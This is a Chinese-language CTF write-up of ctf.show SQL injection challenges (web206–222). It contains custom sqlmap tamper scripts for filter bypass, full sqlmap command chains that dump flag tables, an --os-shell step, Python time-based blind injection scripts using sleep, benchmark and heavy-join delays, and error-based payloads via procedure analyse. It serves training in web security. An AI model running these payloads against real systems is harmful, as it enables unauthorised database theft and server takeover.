数据
python sqlmap.py -u http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch -D ctfshow_web -T ctfshow_flaxc -C flagv --dump

web207

sqlmap的tamper编写

基本结构

mytamper.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW # 当前脚本调用优先等级

def dependencies(): # 声明当前脚本适用/不适用的范围,可以为空。
    pass

def tamper(payload, **kwargs): # 用于篡改Payload、以及请求头的主要函数
    return payload

把他保存在sqlmap\tamper路径下,然后使用的时候就加上 --tamper=mytamper就好了

分析

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import random

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def randomIP():
    numbers = []

    while not numbers or numbers[0] in (10, 172, 192):
        numbers = random.sample(xrange(1, 255), 4)

    return '.'.join(str(_) for _ in numbers)

def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload

分别包括import部分 __priority__属性 dependencies函数 tamper函数以及用户自定义的函数

import

这一部分我们可以导入sqlmap的内部库,sqlmap为我们提供了很多封装好的函数和数据模型,比如下文的PRORITY就来源于 selmap/lib/core/enums.py

PRIORITY

PRIORITY是定义tamper的优先级,PRIORITY有以下几个参数

  • LOWEST = -100
  • LOWER = -50
  • LOW = -10
  • NORMAL = 0
  • HIGH = 10
  • HIGHER = 50
  • HIGHER = 50
  • HIGHEST = 100

如果使用了多个tamper,sqlmap会根据每一个tamper定义的PRIORITY的参数等级来优先使用等级较高的tamper,如果你有两个tamper需要同时用,需要注意

dependencies

dependencies主要是提示用户,增tamper支持哪些数据可以支持哪些数据库

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS

__priority__ = PRIORITY.NORMAL

def dependencies():
    singleTimeWarnMessage("这是我的tamper提示")

def tamper(payload, **kwargs):
    return payload

DBMS.MYSQL这个参数代表的是Mysql,其他数据库的参数也可以看这个\sqlmap\lib\core\enums.py

image-20220407203541626

tamper

tamper这个函数是tamper最重要的函数,你要实现的功能,全部写在这个函数里.payload这个参数就是sqlmap的原始注入payload,我们要实现绕过,一般就是针对这个payload的修改.kwargs是针对http头部的修改,如果你是bypass,是通过修改http头,就需要使用这个

基于payload

先来基于修改payload来绕过替换关键字,我使用sqlilab的第一关,并且修改了部分代码来把恶意关键字替换为空来避免联合查询,如图

image-20220407203858410

编写tamper来双写绕过

def tamper(payload, **kwargs):
    payload = payload.lower()
    payload = payload.replace('select','seleselectct')
    payload = payload.replace('union','ununionion')
    return payload

没有使用tamper之前,我们加上--tech=U来让sqlmap只测试联合查询注入,--flush-session意思是每次刷新会话,清理上次的缓存。

sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --dbms=mysql

image-20220407203933797

从burp的流量中看到payload是没有双写的,必然会注入失败。而使用了tamper之后

sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --tamper=my --dbms=mysql

image-20220407203955653

image-20220407204001885

基于http头

我没使用sqlmap\tamper\xforwardedfor.py的tamper来讲解

def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload

从kwargs中取出headers数组,然后修改了xff值达到随机IP的效果,不再赘述。

Tamper 速查

脚本名称作用
apostrophemask.py用utf8代替引号
equaltolike.pylike 代替等号
space2dash.py绕过过滤’=’ 替换空格字符("),(‘’ - ')后跟一个破折号注释,一个随机字符串和一个新行(‘n’)
greatest.py绕过过滤’>’ ,用GREATEST替换大于号。
space2hash.py空格替换为#号 随机字符串 以及换行符
apostrophenullencode.py绕过过滤双引号,替换字符和双引号。
halfversionedmorekeywords.py当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论
space2morehash.py空格替换为 #号 以及更多随机字符串 换行符
appendnullbyte.py在有效负荷结束位置加载零字节字符编码
ifnull2ifisnull.py绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)‘为’IF(ISNULL(A), B, A)’
space2mssqlblank.py空格替换为其它空符号
base64encode.py用base64编码替换
space2mssqlhash.py替换空格
modsecurityversioned.py过滤空格,包含完整的查询版本注释
space2mysqlblank.py空格替换其它空白符号(mysql)
between.py用between替换大于号(>)
space2mysqldash.py替换空格字符(")(’ - ‘)后跟一个破折号注释一个新行(’ n’)
multiplespaces.py围绕SQL关键字添加多个空格
space2plus.py用+替换空格
bluecoat.py代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like
nonrecursivereplacement.py取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、“”)) filters
space2randomblank.py代替空格字符(“”)从一个随机的空白字符可选字符的有效集
sp_password.py追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
chardoubleencode.py双url编码(不处理以编码的)
unionalltounion.py替换UNION ALL SELECT UNION SELECT
charencode.pyurl编码
randomcase.py随机大小写
unmagicquotes.py宽字符绕过 GPC addslashes
randomcomments.py/**/ 分割sql关键字
charunicodeencode.py字符串unicode编码
securesphere.py追加特制的字符串
versionedmorekeywords.py注释绕过
space2comment.pyReplaces space character ' ' with comments /**/

我们来试一下哦 web207.py 大概意思就是把空格用 0x0a代替也就是回车

#!/usr/bin/env python

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def tamper(payload,**kwargs):
    payload = space2comment(payload)
    return payload
def space2comment(payload):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote , firstspace = False, False ,False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue
            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '"':
                doublequote = not doublequote
            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue
            retVal += payload[i]

    return  retVal

我们挂一下代理看看是怎么改的

python sqlmap.py -u http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch --proxy="http://127.0.0.1:8080"

image-20220407210406203

注入点
python sqlmap.py -u http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch
数据库
python sqlmap.py -u http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch --dbs
表名
python sqlmap.py -u http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch -D ctfshow_web --tables
字段名
python sqlmap.py -u http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch -D ctfshow_web -T ctfshow_flaxca --columns
数据
python sqlmap.py -u http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://6cb6bdef-c812-4cfe-aca7-03c24ef0d0ae.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web207 --batch -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump

web208

小括号闭合,大小写

image-20220407210921431

这时你就需要–prefix和–suffix参数了:

python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "’)" --suffix "AND (’abc’=’abc"
注入点
python sqlmap.py -u "http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment,randomcase" --batch
数据库
python sqlmap.py -u "http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment,randomcase" --batch --dbs 
表名
python sqlmap.py -u "http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment,randomcase" --batch -D ctfshow_web --tables
字段名
python sqlmap.py -u "http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment,randomcase" --batch -D ctfshow_web -T ctfshow_flaxcac --columns
数据
python sqlmap.py -u "http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://5641ec05-7308-4a20-94df-ff748404524d.challenge.ctf.show/api/getToken.php" --safe-freq=1 --prefix="')" --tamper="space2comment,randomcase" --batch -D ctfshow_web -T ctfshow_flaxcac -C flagvca --dump

web209

image-20220407215132018

过滤* 等号和空格

web209.py

#!/usr/bin/env python

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def tamper(payload , **kwargs):
    payload = space2comment(payload)
    return payload
def space2comment(payload):
    retVal = payload
    if payload:
        retVal = ""
        quote , doublequote , firstspace = False ,False ,False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += (chr(0x0a)) #return
                    continue
            elif payload[i] =="\'":
                quote = not quote
            elif payload[i] == '"':
                doublequote = not doublequote
            elif payload[i] == "*":
                retVal += chr(0x31)#1
                continue
            elif payload[i] == "=":
                retVal += chr(0x0a) + 'like' + chr(0x0a)
                continue
            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue
            retVal += payload[i]
    return retVal
注入点
python sqlmap.py -u http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209
数据库
python sqlmap.py -u http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209 --dbs 
表名
python sqlmap.py -u http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209 -D ctfshow_web --tables
字段名
python sqlmap.py -u http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209 -D  ctfshow_web -T  ctfshow_flav --columns
数据
python sqlmap.py -u http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://4f3acfe3-bc6e-460e-93a3-478fce4abd78.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web209 -D  ctfshow_web -T  ctfshow_flav -C ctfshow_flagx --dump

web210

base64解密

image-20220407214810805

web210.py

#!/usr/bin/env python
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64

__priority__ = PRIORITY.LOW

def tamper(payload, **kwargs):
    payload = space2comment(payload)
    retVal = ""
    if payload:
        retVal = base64.b64encode(payload[::-1].encode('utf-8')) #翻转字符串以utf-8便码成二进制
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')#解码成utf-8
    return retVal

def space2comment(payload):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote , firstspqce = False ,False ,False

        for i in xrange(len(payload)):
            if not firstspqce:
                if payload[i].isspace():
                    firstspqce = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == "\'":
                quote = not quote
            elif payload[i] == '"':
                doublequote = not doublequote
            elif payload[i] == "*":
                retVal += chr(0x31)
                continue
            elif payload[i] == "=":
                retVal += chr(0x0a) + 'like' + chr(0x0a)
                continue
            elif payload[i] == " "and not doublequote and not quote:
                retVal += chr(0x0a)
                continue
            retVal += payload[i]
        return retVal
注入点
python sqlmap.py -u http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210
数据库
python sqlmap.py -u http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 --dbs
表名
python sqlmap.py -u http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 --tables -D  ctfshow_web
字段名
python sqlmap.py -u http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T  ctfshow_flavi --columns 
数据
python sqlmap.py -u http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://27df2ca5-41a5-454c-b26b-83fc12edff4a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T  ctfshow_flavi -C ctfshow_flagxx --dump 

web211

base64解密翻转字符过滤空格

image-20220407221144978

210脚本

注入点
python sqlmap.py -u http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210
数据库
python sqlmap.py -u http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 --dbs
表名
python sqlmap.py -u http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 --tables -D  ctfshow_web
字段名
python sqlmap.py -u http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T  ctfshow_flavia --columns 
数据
python sqlmap.py -u http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://974f3919-1928-425e-a9d0-942297f1c8e8.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T  ctfshow_flavia -C ctfshow_flagxxa --dump 

web212

base64解密翻转字符过滤空格 *

image-20220407221504134

http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/

注入点
python sqlmap.py -u http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210
数据库
python sqlmap.py -u http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 --dbs
表名
python sqlmap.py -u http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 --tables -D  ctfshow_web
字段名
python sqlmap.py -u http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T  ctfshow_flavis --columns 
数据
python sqlmap.py -u http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://2060b640-0f90-4916-8d78-7048d5d40413.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --tamper=web210 -D ctfshow_web -T  ctfshow_flavis -C ctfshow_flagxsa --dump 

web213

使用–os-shell 一键getshell

python sqlmap.py -u http://45646f72-e298-4956-87c9-62cea287a473.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://45646f72-e298-4956-87c9-62cea287a473.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web210 --dump  --os-shell --batch

这里还没写完,但是已经写的差不多了

image-20220407222705713

发现是一个上传文件页面

image-20220407222740808

image-20220407223832502

image-20220407223908157

image-20220407223941771

web214

没找到参数在哪,翻翻源码看看

image-20220408110118163

image-20220408110151699

image-20220408110311009

我们看看这个select.js的写法,发现向api/post了ip和debug两个参数

时间盲注

判断

import requests
url = "http://74b615cd-aac0-4c4a-889f-84aa544d2a96.challenge.ctf.show/api/"
payload = "length(database())=0" #没延迟
#payload = "length(database())>0" #延迟
date = {
    'ip': f"if(({payload}),sleep(2),1)",
    'debug': "0"
}
try:
    r = requests.post(url, data=date, timeout=1)
    print('没延迟')
except Exception as e:
    print('延迟')
"""
Author:Y4tacker
"""
import requests

url = "http://d23ee9e9-3e43-4b0a-b172-547561ea456d.chall.ctf.show/api/"

result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查列名字-id.flag
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        # 查数据
        payload = "select flaga from ctfshow_flagx"
        data = {
            'ip': f"if(ascii(substr(({payload}),{i},1))>{mid},sleep(1),1)",
            'debug':'0'
        }
        try:
            r = requests.post(url, data=data, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web215

过滤单引号时间盲注

"""
Author:Y4tacker
"""
import requests

url = "http://4ba8a766-0fda-4c66-bdbc-0e3f0a9d57dc.chall.ctf.show/api/"

result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查列名字-id.flag
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'"
        # 查数据
        payload = "select flagaa from ctfshow_flagxc"
        data = {
            'ip': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(1),1) and '1'='1",
            'debug':'0'
        }
        try:
            r = requests.post(url, data=data, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web216

base64解码id

image-20220408124221533

"""
Author:Y4tacker
"""
import requests

url = "http://0f3060ee-be00-4090-a8e7-fc0944779c24.chall.ctf.show/api/"

result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查列名字-id.flag
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'"
        # 查数据
        payload = "select flagaac from ctfshow_flagxcc"
        data = {
            'ip': f"'MQ==') or if (ascii(substr(({payload}),{i},1))>{mid},sleep(1),1",
            'debug':'0'
        }
        try:
            r = requests.post(url, data=data, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web217

benchmark()时间盲注

image-20220408132254910

 benchmark(t,exp)
     select benchmark(count,expr),是重复执行count次expr表达式,使得处理时间很长,来产生延迟,
     比如select benchmark(1000000,encode("hello","good"));
     select benchmark( 5000000, md5( 'test' ));

判断

import requests
url = "http://9b2612c9-bd0f-4733-9729-1efec72f21f9.challenge.ctf.show/api/"
#payload = "length(database())=0" #没延迟
payload = "length(database())>0" #延迟
date = {
    'ip': f"1) or if(({payload}),benchmark(3480500,sha(1)),1)#",
    'debug': "0"
}
try:
    r = requests.post(url, data=date, timeout=1)
    print('没延迟')
except Exception as e:
    print('延迟')
import requests
import time

url = "http://bc98f2a3-911d-4606-9d0e-e277bf086bdf.challenge.ctf.show/api/"

ans = ""
i = 0

while True:
    i += 1
    head = 32
    tail = 127
    j = 0
    while head < tail:
        j += 1
        if j / 2 == 1: #算两个让数据库歇一会,不然数据库还没算完,就算下一个会有误差
            time.sleep(2)
        mid = (head + tail) >> 1
        #表名 ctfshow_flagxccb
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #字段名 flagaabc
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxccb'"
        # 数据 防止查错咱们多等会呗,可用改改benchmark的循环次数,我改到7400000
        payload = "select flagaabc from ctfshow_flagxccb"

        data = {
            'ip' :f"1) or if((ascii(substr(({payload}),{i},1)))>{mid},benchmark(3480500,sha(1)),1",
            'debug' : '0'
        }

        try:
            r = requests.post(url , data= data ,timeout=1)
            #time.sleep(0.3)
            tail = mid
        except Exception as e:
            head = mid +1
    if head != 32:
        ans += chr(head)
    else:
        break
    print(ans)

MySQL时间盲注五种延时方法

web218

多表联合查询时间盲注

image-20220408142736722

import requests
import time

url = "http://8121f42d-c9da-4307-94b0-c7345a92f907.challenge.ctf.show/api/"

ans = ""
i = 0

while True:
    i += 1
    head = 32
    tail = 127
    j = 0
    while head < tail:
        j += 1
        #算两个让数据库歇一会,不然数据库还没算完,就算下一个会有误差
        time.sleep(6)
        mid = (head + tail) >> 1
        #表名 ctfshow_flagxc
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #字段名 flagaabc
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'"
        # 数据 防止查错咱们多等会呗 我直接就查一个
        payload = "select flagaac from ctfshow_flagxc"
        #ctfshow{2d33427a-d593-4d42-85a2-a459a676b1b0}
        data = {
            'ip' :f"1) or if((ascii(substr(({payload}),{i},1)))>{mid},(SELECT count(*) FROM information_schema.columns A, information_schema.schemata B, information_schema.schemata C, information_schema.schemata D,information_schema.schemata F,information_schema.schemata H),1",
            'debug' : '0'
        }

        try:
            r = requests.post(url , data= data ,timeout=1)
            #time.sleep(0.3)
            tail = mid
        except Exception as e:
            head = mid +1
    if head != 32:
        ans += chr(head)
    else:
        break
    print(ans)

web219

image-20220408172145807

import requests
import time

url = "http://51762119-b7e0-4b2a-a392-0f5fded552ac.challenge.ctf.show/api/"

ans = ""
i = 0

while True:
    i += 1
    head = 32
    tail = 127
    j = 0
    while head < tail:
        j += 1
        #算两个让数据库歇一会,不然数据库还没算完,就算下一个会有误差

        mid = (head + tail) >> 1
        #表名 ctfshow_flagxca
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        #字段名 flagaabc
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxca'"
        # 数据 防止查错咱们多等会呗 我直接就查一个
        payload = "select flagaabc from ctfshow_flagxca"
        #ctfshow{96c90aaa-5a9f-48bf-9ff0-814874d503f1}
        data = {
            'ip' :f"1) or if((ascii(substr(({payload}),{i},1)))>{mid},1,(SELECT count(*) FROM information_schema.columns A, information_schema.schemata B, information_schema.schemata C, information_schema.schemata D,information_schema.schemata F,information_schema.schemata H)",
            'debug' : '0'
        }

        try:
            r = requests.post(url , data= data ,timeout=1)
            #time.sleep(0.3)
            head = mid +1
        except Exception as e:
            tail = mid
            time.sleep(6)
    if head != 32:
        ans += chr(head)
    else:
        break
    print(ans)

web220

image-20220408184439334

import requests
import time

url = "http://51762119-b7e0-4b2a-a392-0f5fded552ac.challenge.ctf.show/api/"
ans = ""
j = 1
dir = "cfi_1234567890{}-qazwsxedcrfvtgbyhnujmikolpQWERTYUIOPASDFGHJKLZXCVBNM"
while True:
    for i in dir:
        ans += i

        #表名 ctfshow_flagxcac
        #payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
        #字段名 ctfshow_flagxcac
        payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1"
        # 数据 防止查错咱们多等会呗 我直接就查一个
        payload = "select flagaabcc from ctfshow_flagxcac"
        #ctfshow{96c90aaa-5a9f-48bf-9ff0-814874d503f1}
        #print(f"if(ord(left({payload},{i}))>{mid},1,(SELECT count(*) FROM information_schema.columns A, information_schema.schemata B, information_schema.schemata C, information_schema.schemata D,information_schema.schemata F,information_schema.schemata H)")

        data = {
            'ip' :f"1) or if((left(({payload}),{j}))='{ans}',(SELECT count(*) FROM information_schema.columns A, information_schema.schemata B, information_schema.schemata C, information_schema.schemata D,information_schema.schemata F,information_schema.schemata H),1",
            'debug' : '0'
        }

        try:
            r = requests.post(url , data= data ,timeout=1)
            #time.sleep(0.3)
            ans = ans[:-1]
            print('正确')
        except Exception as e:
            print(ans)
            j += 1
            time.sleep(6)
            print('错误')

web221

limit报错注入

image-20220408211002396

mysql利用procedure analyse()函数优化表的结构

image-20220408211135617

/api/?page=1&limit=10  procedure analyse(extractvalue(rand(),concat(0x3a,database())),2)

image-20220408212617134

直接提交这个数据库哦

还有这个

/api/?page=1&limit=10  procedure analyse((updatexml(1,concat(0x7e,database(),0x7e),1)),2)

web222

group by 注入

image-20220408213246662

